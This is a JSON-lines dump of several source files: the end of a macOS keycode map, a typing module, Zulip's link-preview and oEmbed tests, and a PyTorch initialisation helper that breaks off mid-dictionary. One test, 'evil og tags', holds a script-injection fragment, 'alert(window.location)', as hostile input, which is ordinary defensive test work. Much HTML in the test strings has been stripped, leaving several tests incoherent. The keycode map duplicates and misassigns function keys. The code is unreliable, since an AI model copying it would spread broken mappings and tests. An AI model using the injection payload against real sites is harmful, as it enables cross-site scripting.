modified_key(Key.BACK_QUOTE, shift=Key.TILDE)(event.modifierFlags),\n 51: Key.BACKSPACE,\n 53: Key.ESCAPE,\n 65: Key.NUMPAD_DECIMAL_POINT,\n 67: Key.NUMPAD_MULTIPLY,\n 69: Key.NUMPAD_PLUS,\n 71: Key.NUMPAD_CLEAR,\n 75: Key.NUMPAD_DIVIDE,\n 76: Key.NUMPAD_ENTER,\n 78: Key.NUMPAD_MINUS,\n 81: Key.NUMPAD_EQUAL,\n 82: Key.NUMPAD_0,\n 83: Key.NUMPAD_1,\n 84: Key.NUMPAD_2,\n 85: Key.NUMPAD_3,\n 86: Key.NUMPAD_4,\n 87: Key.NUMPAD_5,\n 88: Key.NUMPAD_6,\n 89: Key.NUMPAD_7,\n 91: Key.NUMPAD_8,\n 92: Key.NUMPAD_9,\n\n # : Key.F4,\n 96: Key.F5,\n 97: Key.F7,\n 98: Key.F5,\n 99: Key.F3,\n 100: Key.F8,\n 101: Key.F9,\n 109: Key.F9,\n 115: Key.HOME,\n 116: Key.PAGE_UP,\n 117: Key.DELETE,\n 119: Key.END,\n 120: Key.F2,\n 121: Key.PAGE_DOWN,\n 122: Key.F1,\n 123: Key.LEFT,\n 124: Key.RIGHT,\n 125: Key.DOWN,\n 126: Key.UP,\n\n }.get(event.keyCode, None)\n\n modifiers = set()\n\n if event.modifierFlags & NSEventModifierFlagCapsLock:\n modifiers.add(Key.CAPSLOCK)\n if event.modifierFlags & NSEventModifierFlagShift:\n modifiers.add(Key.SHIFT)\n if event.modifierFlags & NSEventModifierFlagControl:\n modifiers.add(Key.CONTROL)\n if event.modifierFlags & NSEventModifierFlagOption:\n modifiers.add(Key.OPTION)\n if event.modifierFlags & NSEventModifierFlagCommand:\n modifiers.add(Key.COMMAND)\n\n return {\n 'key': key,\n 'modifiers': modifiers\n }\n"} {"ext": "py", "sha": "1a302ea2ccac42f1bd5bfe99e4fba91d1cf256e8", "content": "# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport typing\n\n# Use consistent types for marshal and unmarshal functions across\n# both JSON and Binary format.\n\nMarshallerType = typing.Optional[\n typing.Callable[[typing.Any], typing.Union[bytes, str]]\n]\nUnmarshallerType = typing.Optional[\n typing.Callable[[typing.Union[bytes, str]], typing.Any]\n]\n"} {"ext": "py", "sha": "1a302ec1ac0b39ce9c344f0781229746f43ec413", "content": "from typing import Any, Callable, Dict, Optional\nfrom unittest import mock\n\nimport orjson\nfrom django.test import override_settings\nfrom django.utils.html import escape\nfrom requests.exceptions import ConnectionError\n\nfrom zerver.lib.actions import queue_json_publish\nfrom zerver.lib.cache import NotFoundInCache, cache_set, preview_url_cache_key\nfrom zerver.lib.test_classes import ZulipTestCase\nfrom zerver.lib.test_helpers import MockPythonResponse, mock_queue_publish\nfrom zerver.lib.url_preview.oembed import get_oembed_data, strip_cdata\nfrom zerver.lib.url_preview.parsers import GenericParser, OpenGraphParser\nfrom zerver.lib.url_preview.preview import get_link_embed_data, link_embed_data_from_cache\nfrom zerver.models import Message, Realm, UserProfile\nfrom zerver.worker.queue_processors import FetchLinksEmbedData\n\nTEST_CACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'default',\n },\n 'database': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'url-preview',\n },\n 'in-memory': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'url-preview',\n },\n}\n\n@override_settings(INLINE_URL_EMBED_PREVIEW=True)\nclass OembedTestCase(ZulipTestCase):\n @mock.patch('pyoembed.requests.get')\n def test_present_provider(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response_data = {\n 'type': 'rich',\n 'thumbnail_url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'thumbnail_width': 640,\n 'thumbnail_height': 426,\n 'title': 'NASA',\n 'html': '

    test

    ',\n 'version': '1.0',\n 'width': 658,\n 'height': 400}\n response.text = orjson.dumps(response_data).decode()\n url = 'http://instagram.com/p/BLtI2WdAymy'\n data = get_oembed_data(url)\n self.assertIsInstance(data, dict)\n self.assertIn('title', data)\n assert data is not None # allow mypy to infer data is indexable\n self.assertEqual(data['title'], response_data['title'])\n\n @mock.patch('pyoembed.requests.get')\n def test_photo_provider(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response_data = {\n 'type': 'photo',\n 'thumbnail_url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'thumbnail_width': 640,\n 'thumbnail_height': 426,\n 'title': 'NASA',\n 'html': '

<p>test</p>
    ',\n 'version': '1.0',\n 'width': 658,\n 'height': 400}\n response.text = orjson.dumps(response_data).decode()\n url = 'http://imgur.com/photo/158727223'\n data = get_oembed_data(url)\n self.assertIsInstance(data, dict)\n self.assertIn('title', data)\n assert data is not None # allow mypy to infer data is indexable\n self.assertEqual(data['title'], response_data['title'])\n self.assertTrue(data['oembed'])\n\n @mock.patch('pyoembed.requests.get')\n def test_video_provider(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response_data = {\n 'type': 'video',\n 'thumbnail_url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'thumbnail_width': 640,\n 'thumbnail_height': 426,\n 'title': 'NASA',\n 'html': '

<p>test</p>
    ',\n 'version': '1.0',\n 'width': 658,\n 'height': 400}\n response.text = orjson.dumps(response_data).decode()\n url = 'http://blip.tv/video/158727223'\n data = get_oembed_data(url)\n self.assertIsInstance(data, dict)\n self.assertIn('title', data)\n assert data is not None # allow mypy to infer data is indexable\n self.assertEqual(data['title'], response_data['title'])\n\n @mock.patch('pyoembed.requests.get')\n def test_error_request(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.ok = False\n url = 'http://instagram.com/p/BLtI2WdAymy'\n data = get_oembed_data(url)\n self.assertIsNone(data)\n\n @mock.patch('pyoembed.requests.get')\n def test_invalid_json_in_response(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response.text = '{invalid json}'\n url = 'http://instagram.com/p/BLtI2WdAymy'\n data = get_oembed_data(url)\n self.assertIsNone(data)\n\n def test_oembed_html(self) -> None:\n html = ''\n stripped_html = strip_cdata(html)\n self.assertEqual(html, stripped_html)\n\n def test_autodiscovered_oembed_xml_format_html(self) -> None:\n iframe_content = ''\n html = f''\n stripped_html = strip_cdata(html)\n self.assertEqual(iframe_content, stripped_html)\n\n\nclass OpenGraphParserTestCase(ZulipTestCase):\n def test_page_with_og(self) -> None:\n html = \"\"\"\n \n \n \n \n \n \n \n \"\"\"\n\n parser = OpenGraphParser(html)\n result = parser.extract_data()\n self.assertIn('title', result)\n self.assertEqual(result['title'], 'The Rock')\n self.assertEqual(result.get('description'), 'The Rock film')\n\n def test_page_with_evil_og_tags(self) -> None:\n html = \"\"\"\n \n \n \n \n \n \n alert(window.location)\" />\n \n \n \"\"\"\n\n parser = OpenGraphParser(html)\n result = parser.extract_data()\n self.assertIn('title', result)\n self.assertEqual(result['title'], 'The Rock')\n self.assertEqual(result.get('description'), 'The Rock film')\n self.assertEqual(result.get('oembed'), None)\n self.assertEqual(result.get('html'), None)\n\nclass GenericParserTestCase(ZulipTestCase):\n def test_parser(self) -> None:\n html = \"\"\"\n \n Test title\n \n

<h1>Main header</h1>
<p>Description text</p>
    \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('title'), 'Test title')\n self.assertEqual(result.get('description'), 'Description text')\n\n def test_extract_image(self) -> None:\n html = \"\"\"\n \n \n

    Main header

    \n \n \n
    \n

    Description text

    \n
    \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('title'), 'Main header')\n self.assertEqual(result.get('description'), 'Description text')\n self.assertEqual(result.get('image'), 'http://test.com/test.jpg')\n\n def test_extract_description(self) -> None:\n html = \"\"\"\n \n \n
    \n
    \n

    Description text

    \n
    \n
    \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('description'), 'Description text')\n\n html = \"\"\"\n \n \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('description'), 'description 123')\n\n html = \"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertIsNone(result.get('description'))\n\n\nclass PreviewTestCase(ZulipTestCase):\n open_graph_html = \"\"\"\n \n \n Test title\n \n \n \n \n \n \n \n \n

<h1>Main header</h1>
<p>Description text</p>
    \n \n \n \"\"\"\n\n def setUp(self) -> None:\n super().setUp()\n Realm.objects.all().update(inline_url_embed_preview=True)\n\n @classmethod\n def create_mock_response(cls, url: str, relative_url: bool=False,\n headers: Optional[Dict[str, str]]=None,\n html: Optional[str]=None) -> Callable[..., MockPythonResponse]:\n if html is None:\n html = cls.open_graph_html\n if relative_url is True:\n html = html.replace('http://ia.media-imdb.com', '')\n response = MockPythonResponse(html, 200, headers)\n return lambda k, **kwargs: {url: response}.get(k, MockPythonResponse('', 404, headers))\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_edit_message_history(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n msg_id = self.send_stream_message(user, \"Scotland\",\n topic_name=\"editing\", content=\"original\")\n\n url = 'http://test.org/'\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n\n with mock_queue_publish('zerver.views.message_edit.queue_json_publish') as patched:\n result = self.client_patch(\"/json/messages/\" + str(msg_id), {\n 'message_id': msg_id, 'content': url,\n })\n self.assert_json_success(result)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n embedded_link = f'The Rock'\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertIn(embedded_link, msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def _send_message_with_test_org_url(self, sender: UserProfile, queue_should_run: bool=True,\n relative_url: bool=False) -> Message:\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_personal_message(\n sender,\n self.example_user('cordelia'),\n content=url,\n )\n if queue_should_run:\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n else:\n patched.assert_not_called()\n # If we nothing was put in the queue, we don't need to\n # run the queue processor or any of the following code\n return Message.objects.select_related(\"sender\").get(id=msg_id)\n\n # Verify the initial message doesn't have the embedded links rendered\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertNotIn(\n f'The Rock',\n msg.rendered_content)\n\n # Mock the network request result so the test can be fast without Internet\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, relative_url=relative_url))\n\n # Run the queue processor to potentially rerender things\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n return msg\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_message_update_race_condition(self) -> None:\n user = 
self.example_user('hamlet')\n self.login_user(user)\n original_url = 'http://test.org/'\n edited_url = 'http://edited.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\",\n topic_name=\"foo\", content=original_url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n def wrapped_queue_json_publish(*args: Any, **kwargs: Any) -> None:\n # Mock the network request result so the test can be fast without Internet\n mocked_response_original = mock.Mock(side_effect=self.create_mock_response(original_url))\n mocked_response_edited = mock.Mock(side_effect=self.create_mock_response(edited_url))\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response_original), self.assertLogs(level='INFO') as info_logs:\n # Run the queue processor. This will simulate the event for original_url being\n # processed after the message has been edited.\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n # The content of the message has changed since the event for original_url has been created,\n # it should not be rendered. Another, up-to-date event will have been sent (edited_url).\n self.assertNotIn(f'The Rock',\n msg.rendered_content)\n mocked_response_edited.assert_not_called()\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response_edited), self.assertLogs(level='INFO') as info_logs:\n # Now proceed with the original queue_json_publish and call the\n # up-to-date event for edited_url.\n queue_json_publish(*args, **kwargs)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertIn(f'The Rock',\n msg.rendered_content)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://edited.org/: ' in info_logs.output[0]\n )\n\n with mock_queue_publish('zerver.views.message_edit.queue_json_publish', wraps=wrapped_queue_json_publish):\n result = self.client_patch(\"/json/messages/\" + str(msg_id), {\n 'message_id': msg_id, 'content': edited_url,\n })\n self.assert_json_success(result)\n\n def test_get_link_embed_data(self) -> None:\n url = 'http://test.org/'\n embedded_link = f'The Rock'\n\n # When humans send, we should get embedded content.\n msg = self._send_message_with_test_org_url(sender=self.example_user('hamlet'))\n self.assertIn(embedded_link, msg.rendered_content)\n\n # We don't want embedded content for bots.\n msg = self._send_message_with_test_org_url(sender=self.example_user('webhook_bot'),\n queue_should_run=False)\n self.assertNotIn(embedded_link, msg.rendered_content)\n\n # Try another human to make sure bot failure was due to the\n # bot sending the message and not some other reason.\n msg = self._send_message_with_test_org_url(sender=self.example_user('prospero'))\n self.assertIn(embedded_link, msg.rendered_content)\n\n def test_inline_url_embed_preview(self) -> None:\n with_preview = '

    http://test.org/

    \\n
    Description text
    '\n without_preview = '

    http://test.org/

    '\n msg = self._send_message_with_test_org_url(sender=self.example_user('hamlet'))\n self.assertEqual(msg.rendered_content, with_preview)\n\n realm = msg.get_realm()\n setattr(realm, 'inline_url_embed_preview', False)\n realm.save()\n\n msg = self._send_message_with_test_org_url(sender=self.example_user('prospero'), queue_should_run=False)\n self.assertEqual(msg.rendered_content, without_preview)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_inline_relative_url_embed_preview(self) -> None:\n # Relative URLs should not be sent for URL preview.\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n self.send_personal_message(\n self.example_user('prospero'),\n self.example_user('cordelia'),\n content=\"http://zulip.testserver/api/\",\n )\n patched.assert_not_called()\n\n def test_inline_url_embed_preview_with_relative_image_url(self) -> None:\n with_preview_relative = '

    http://test.org/

    \\n
    Description text
    '\n # Try case where the Open Graph image is a relative URL.\n msg = self._send_message_with_test_org_url(sender=self.example_user('prospero'), relative_url=True)\n self.assertEqual(msg.rendered_content, with_preview_relative)\n\n def test_http_error_get_data(self) -> None:\n url = 'http://test.org/'\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n with self.settings(INLINE_URL_EMBED_PREVIEW=True, TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mock.Mock(side_effect=ConnectionError())), \\\n self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n msg = Message.objects.get(id=msg_id)\n self.assertEqual(\n '

    http://test.org/

    ',\n msg.rendered_content)\n\n def test_invalid_link(self) -> None:\n with self.settings(INLINE_URL_EMBED_PREVIEW=True, TEST_SUITE=False, CACHES=TEST_CACHES):\n self.assertIsNone(get_link_embed_data('com.notvalidlink'))\n self.assertIsNone(get_link_embed_data('μένει.com.notvalidlink'))\n\n def test_link_embed_data_from_cache(self) -> None:\n url = 'http://test.org/'\n link_embed_data = 'test data'\n\n with self.assertRaises(NotFoundInCache):\n link_embed_data_from_cache(url)\n\n with self.settings(CACHES=TEST_CACHES):\n key = preview_url_cache_key(url)\n cache_set(key, link_embed_data, 'database')\n self.assertEqual(link_embed_data, link_embed_data_from_cache(url))\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_non_html_data(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/audio.mp3'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n headers = {'content-type': 'application/octet-stream'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, headers=headers))\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n cached_data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/audio.mp3: ' in info_logs.output[0]\n )\n\n self.assertIsNone(cached_data)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertEqual(\n ('

    '\n 'http://test.org/audio.mp3

    '),\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_no_open_graph_image(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/foo.html'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n # HTML without the og:image metadata\n html = '\\n'.join(line for line in self.open_graph_html.splitlines() if 'og:image' not in line)\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, html=html))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n cached_data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/foo.html: ' in info_logs.output[0]\n )\n\n self.assertIn('title', cached_data)\n self.assertNotIn('image', cached_data)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertEqual(\n ('

    '\n 'http://test.org/foo.html

    '),\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_open_graph_image_missing_content(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/foo.html'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n # HTML without the og:image metadata\n html = '\\n'.join(line if 'og:image' not in line else ''\n for line in self.open_graph_html.splitlines())\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, html=html))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n cached_data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/foo.html: ' in info_logs.output[0]\n )\n\n self.assertIn('title', cached_data)\n self.assertNotIn('image', cached_data)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertEqual(\n ('

    '\n 'http://test.org/foo.html

    '),\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_no_content_type_header(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n headers = {'content-type': ''} # No content type header\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, headers=headers))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n self.assertIn('title', data)\n self.assertIn('image', data)\n\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertIn(data['title'], msg.rendered_content)\n self.assertIn(data['image'], msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_valid_content_type_error_get_data(self) -> None:\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n with mock.patch('zerver.lib.url_preview.preview.get_oembed_data', side_effect=lambda *args, **kwargs: None):\n with mock.patch('zerver.lib.url_preview.preview.valid_content_type', side_effect=lambda k: True):\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mock.Mock(side_effect=ConnectionError())), \\\n self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n with self.assertRaises(NotFoundInCache):\n link_embed_data_from_cache(url)\n\n msg.refresh_from_db()\n self.assertEqual(\n '

    http://test.org/

    ',\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_invalid_url(self) -> None:\n url = 'http://test.org/'\n error_url = 'http://test.org/x'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=error_url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [error_url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': error_url}\n\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/x: ' in info_logs.output[0]\n )\n cached_data = link_embed_data_from_cache(error_url)\n\n # FIXME: Should we really cache this, especially without cache invalidation?\n self.assertIsNone(cached_data)\n msg.refresh_from_db()\n self.assertEqual(\n '

    http://test.org/x

    ',\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_safe_oembed_html_url(self) -> None:\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n mocked_data = {'html': f'',\n 'oembed': True, 'type': 'video', 'image': f'{url}/image.png'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n with mock.patch('zerver.lib.url_preview.preview.get_oembed_data',\n lambda *args, **kwargs: mocked_data):\n FetchLinksEmbedData().consume(event)\n data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n self.assertEqual(data, mocked_data)\n msg.refresh_from_db()\n self.assertIn('a data-id=\"{}\"'.format(escape(mocked_data['html'])), msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_youtube_url_title_replaces_url(self) -> None:\n url = 'https://www.youtube.com/watch?v=eSJTXC7Ixgg'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n mocked_data = {'title': 'Clearer Code at Scale - Static Types at Zulip and Dropbox'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n with mock.patch('zerver.lib.markdown.link_preview.link_embed_data_from_cache',\n lambda *args, **kwargs: mocked_data):\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for https://www.youtube.com/watch?v=eSJTXC7Ixgg:' in info_logs.output[0]\n )\n\n msg.refresh_from_db()\n expected_content = '

    YouTube - Clearer Code at Scale - Static Types at Zulip and Dropbox

    \\n
    '\n self.assertEqual(expected_content, msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_custom_title_replaces_youtube_url_title(self) -> None:\n url = '[YouTube link](https://www.youtube.com/watch?v=eSJTXC7Ixgg)'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n mocked_data = {'title': 'Clearer Code at Scale - Static Types at Zulip and Dropbox'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n with mock.patch('zerver.lib.markdown.link_preview.link_embed_data_from_cache',\n lambda *args, **kwargs: mocked_data):\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for [YouTube link](https://www.youtube.com/watch?v=eSJTXC7Ixgg):' in info_logs.output[0]\n )\n\n msg.refresh_from_db()\n expected_content = '

    YouTube link

    \\n
    '\n self.assertEqual(expected_content, msg.rendered_content)\n"} {"ext": "py", "sha": "1a302fc538ed2033f4d04d52bf90988eb52c0149", "content": "import math\nfrom ..utility.static_vars import *\n\n\ndef _constant(parameter, value):\n parameter.data.fill_(value)\n\n\ndef _zero(parameter):\n _constant(parameter, 0)\n\n\ndef _one(parameter):\n _constant(parameter, 1)\n\n\ndef _normal(parameter, mean, std):\n parameter.data.normal_(mean, std)\n\n\ndef _uniform(parameter, bound):\n parameter.data.uniform_(-bound, bound)\n\n\ndef _kaiming(parameter, fan, a):\n _uniform(parameter, math.sqrt(6 / ((1 + a ** 2) * fan)))\n\n\ndef _glorot(parameter):\n _uniform(parameter, math.sqrt(6.0 / (parameter.size(-2) + parameter.size(-1))))\n\n\n@static_vars(fun=None)\ndef init(parameter, type, *args, **kwargs):\n \"\"\"\n Initialize the given parameters with the specified initialization type\n\n Parameters\n ----------\n parameter : torch.nn.Parameter\n the parameter to initialize\n type : str\n the initialization type. Should be one between:\n 'constant', 'zero', 'one', 'normal', 'kaiming', 'glorot' (or 'xavier')\n args : ...\n the arguments of the specified initialization type\n kwargs : ...\n the keyword arguments of the specified initialization type\n\n Returns\n -------\n torch.nn.Parameter\n the initialized parameter\n \"\"\"\n if not init.fun:\n init.fun = {\n 'constant': _constant,\n 'zero': _zero,\n 'one': _one,\n 'normal': _normal,\n 'kaiming': _kaiming,\n 'glorot': _glorot,\n 'xavier': 